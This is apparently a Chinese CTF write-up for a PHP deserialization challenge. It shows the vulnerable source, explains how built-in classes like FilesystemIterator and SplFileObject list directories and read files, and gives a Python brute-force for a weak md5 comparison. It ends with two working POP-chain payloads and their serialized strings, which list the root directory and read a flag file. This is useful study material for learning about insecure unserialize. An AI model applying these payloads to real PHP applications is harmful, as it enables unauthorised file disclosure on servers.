源码:
<?php
/**
* @Author: hey
* @message: Patience is the key in life,I think you'll be able to find vulnerabilities in code audits.
* Have fun and Good luck!!!
*/
error_reporting(0);
class Sakura{
public $apple;
public $strawberry;
public function __construct($a){
$this -> apple = $a;
}
function __destruct()
{
echo $this -> apple;
}
public function __toString()
{
$new = $this -> strawberry;
return $new();
}
}
class NoNo {
private $peach;
public function __construct($string) {
$this -> peach = $string;
}
public function __get($name) {
$var = $this -> $name;
$var[$name]();
}
}
class BasaraKing{
public $orange;
public $cherry;
public $arg1;
public function __call($arg1,$arg2){
$function = $this -> orange;
return $function();
}
public function __get($arg1)
{
$this -> cherry -> ll2('b2');
}
}
class UkyoTachibana{
public $banana;
public $mangosteen;
public function __toString()
{
$long = @$this -> banana -> add();
return $long;
}
public function __set($arg1,$arg2)
{
if($this -> mangosteen -> tt2)
{
echo "Sakura was the best!!!";
}
}
}
class E{
public $e;
public function __get($arg1){
array_walk($this, function ($Monday, $Tuesday) {
$Wednesday = new $Tuesday($Monday);
foreach($Wednesday as $Thursday){
echo ($Thursday.'<br>');
}
});
}
}
class UesugiErii{
protected $coconut;
protected function addMe() {
return "My time with Sakura was my happiest time".$this -> coconut;
}
public function __call($func, $args) {
call_user_func([$this, $func."Me"], $args);
}
}
class Heraclqs{
public $grape;
public $blueberry;
public function __invoke(){
if(md5(md5($this -> blueberry)) == 123) {
return $this -> grape -> hey;
}
}
}
class MaiSakatoku{
public $Carambola;
private $Kiwifruit;
public function __set($name, $value)
{
$this -> $name = $value;
if ($this -> Kiwifruit = "Sakura"){
strtolower($this-> Carambola);
}
}
}
if(isset($_POST['GHCTF'])) {
unserialize($_POST['GHCTF']);
} else {
highlight_file(__FILE__);
}
array_walk函数
array_walk() 函数对数组中的每个元素应用用户自定义函数。
原生类的利用
一.可遍历目录类
DirectoryIterator
FilesystemIterator
GlobIterator 与上面略不同,该类可以通过模式匹配来寻找文件路径。
二.可读取文件类
SplFileObject 在此函数中,URL 可作为文件名,不过也要受到allow_url_fopen影响。
二.文件系统相关扩展
finfo 该类的构造函数finfo::__construct — 别名 finfo_open(),也可以读取文件。
pop链
E::__get -> Heraclqs::__invoke -> Sakura::__toString -> Sakura::__destruct
Heraclqs::__invoke中有一个弱比较
public function __invoke(){
if(md5(md5($this -> blueberry)) == 123) {
return $this -> grape -> hey;
}
}
爆破以下即可
import hashlib
import itertools
import string
for i in itertools.product(string.printable, repeat=3):
s = ''.join(i)
s1 = hashlib.md5(s.encode()).hexdigest()
s2 = hashlib.md5(s1.encode()).hexdigest()
if s2[:3] == '123':
print(s)
playload1:
<?php
class Sakura{
public $apple;
public $strawberry;
// function __destruct()
// {
// echo $this -> apple;
// }
// public function __toString()
// {
// $new = $this -> strawberry;
// return $new();
// }
}
class E{
public $e;
// public function __get($arg1){
// array_walk($this, function ($Monday, $Tuesday) {
// $Wednesday = new $Tuesday($Monday);
// foreach($Wednesday as $Thursday){
// echo ($Thursday.'<br>');
// }
// });
// }
}
class Heraclqs{
public $grape;
public $blueberry;
// public function __invoke(){
// if(md5(md5($this -> blueberry)) == 123) {
// return $this -> grape -> hey;
// }
// }
}
$a1=new E;
$a1->FilesystemIterator='/';
$a2=new Heraclqs;
$a2->blueberry='LLh';
$a2->grape=$a1;
$a3=new Sakura;
$a3->strawberry=$a2;
$a4=new Sakura;
$a4->apple=$a3;
$s=serialize($a4);
echo $s;
?>
//O:6:"Sakura":2:{s:5:"apple";O:6:"Sakura":2:{s:5:"apple";N;s:10:"strawberry";O:8:"Heraclqs":2:{s:5:"grape";O:1:"E":2:{s:1:"e";N;s:18:"FilesystemIterator";s:1:"/";}s:9:"blueberry";s:3:"LLh";}}s:10:"strawberry";N;}
palyload2:
<?php
class Sakura{
public $apple;
public $strawberry;
// function __destruct()
// {
// echo $this -> apple;
// }
// public function __toString()
// {
// $new = $this -> strawberry;
// return $new();
// }
}
class E{
public $e;
// public function __get($arg1){
// array_walk($this, function ($Monday, $Tuesday) {
// $Wednesday = new $Tuesday($Monday);
// foreach($Wednesday as $Thursday){
// echo ($Thursday.'<br>');
// }
// });
// }
}
class Heraclqs{
public $grape;
public $blueberry;
// public function __invoke(){
// if(md5(md5($this -> blueberry)) == 123) {
// return $this -> grape -> hey;
// }
// }
}
$a1=new E;
$a1->SplFileObject='/1_ffffffflllllagggggg';
$a2=new Heraclqs;
$a2->blueberry='LLh';
$a2->grape=$a1;
$a3=new Sakura;
$a3->strawberry=$a2;
$a4=new Sakura;
$a4->apple=$a3;
$s=serialize($a4);
echo $s;
?>
//O:6:"Sakura":2:{s:5:"apple";O:6:"Sakura":2:{s:5:"apple";N;s:10:"strawberry";O:8:"Heraclqs":2:{s:5:"grape";O:1:"E":2:{s:1:"e";N;s:13:"SplFileObject";s:22:"/1_ffffffflllllagggggg";}s:9:"blueberry";s:3:"LLh";}}s:10:"strawberry";N;}
![[终端安全]-7 后量子密码算法](https://i-blog.csdnimg.cn/direct/dbbe4ec736f04469bb82618067756506.png)
